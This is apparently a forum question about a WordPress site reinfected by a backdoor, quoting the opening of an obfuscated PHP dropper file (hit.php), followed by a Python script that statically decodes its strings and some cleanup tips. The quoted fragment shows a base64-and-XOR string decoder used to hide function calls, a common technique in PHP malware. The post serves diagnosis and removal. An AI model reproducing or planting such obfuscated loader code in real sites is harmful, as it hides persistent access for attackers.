How to completely cure a WordPress site from the backdoor cSR virus?
A virus was noticed on the WordPress site, the code of which managed to multiply in the files: wp-config.php, index.php, and also created other files in different folders.
As a result, what was done:
1) Using the Wordfence Security plugin scanner, all virus files were found and deleted
2) Completely overwrote all WordPress files
3) Installed and configured iThemes Security properly
4) Changed the password on FTP, changed passwords in the WP admin panel
For the third day now, the problem is this:
- a hit.php file is created in the root of the site, with the following initial content (the file is long, so I am not pasting all of it):
<?php
function r6ZVq($DxfSB3xgkeK)
{
    $yWj2kmO='jbJPz';
    $oeUU7hsO='ZTV1IH';
    $DxfSB3xgkeK=base64_decode($DxfSB3xgkeK);
    $yHBPZX=17;
    $heUw1F=(1130+1433-2352);
    $KMyJBhO=(606-1191+585);
    $IZk1uAY='';
    while(true)
    {
        if($KMyJBhO==strlen($DxfSB3xgkeK))
            break;
        elseif($KMyJBhO%(-1007+152+857)==0)
            $HD5ZzPdib=(ord($DxfSB3xgkeK[$KMyJBhO])-$yHBPZX)%(929+1366-2039);
        else
            $HD5ZzPdib=ord($DxfSB3xgkeK[$KMyJBhO])^$heUw1F;
        $IZk1uAY.=chr($HD5ZzPdib);
        $KMyJBhO+=1;
    }
    return $IZk1uAY;
}
class ItuCN4Hc
{
    static public function qmUFL($bRS8AA)
    {
        $D5QnuExrvE5='YPwT9Scmfvv';
        $UB6Ai=r6ZVq("dquFtn+gerx/jH28crd2tw==");
        return $UB6Ai($bRS8AA);
    }
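The string decoder in the fragment above can be reproduced offline, so the hidden function names can be read without executing any of hit.php. The following is an added example, not part of the original post; `decode_blob`, `decode_calls` and `SAMPLE` are names chosen here, and the constants are taken from the posted `r6ZVq()` after folding its arithmetic.

```python
import base64
import re

# Constants from the posted r6ZVq(), with the obfuscated arithmetic folded.
SUB_KEY = 17                  # $yHBPZX, subtracted from bytes at even offsets
XOR_KEY = 1130 + 1433 - 2352  # $heUw1F = 211, XORed into bytes at odd offsets
MODULUS = 929 + 1366 - 2039   # 256, keeps the subtraction inside one byte


def decode_blob(blob: str) -> str:
    """Statically mirror r6ZVq(): base64-decode, then transform each byte
    according to whether its offset is even or odd."""
    raw = base64.b64decode(blob, validate=True)
    out = bytearray()
    for offset, byte in enumerate(raw):
        if offset % 2 == 0:
            out.append((byte - SUB_KEY) % MODULUS)
        else:
            out.append(byte ^ XOR_KEY)
    return out.decode("latin-1")


def decode_calls(php_source: str, func_name: str = "r6ZVq"):
    """Find every func_name("<base64>") call in PHP text and decode its
    argument. The decoder's name is passed in because it may differ from
    file to file (an assumption; only one sample is on this page)."""
    pattern = re.compile(
        re.escape(func_name) + r"""\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)"""
    )
    decoded = []
    for match in pattern.finditer(php_source):
        blob = match.group(1)
        try:
            decoded.append((blob, decode_blob(blob)))
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded.append((blob, "<not valid base64>"))
    return decoded


# Two lines copied from the fragment posted in the question.
SAMPLE = '''$UB6Ai=r6ZVq("dquFtn+gerx/jH28crd2tw==");
return $UB6Ai($bRS8AA);'''

if __name__ == "__main__":
    for blob, text in decode_calls(SAMPLE):
        print(f"{blob} -> {text}")
```

For the one encoded string visible in the post, the result is `extension_loaded`, so `qmUFL()` is only a wrapper around that PHP built-in; the rest of the file would need the same treatment to see what it actually calls.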
Check the database for extra tables
Check the contents of functions.php
Scan with Wordfence for extra files in wp-includes and wp-content
If you installed "left" premium plugins, then view the contents of their files.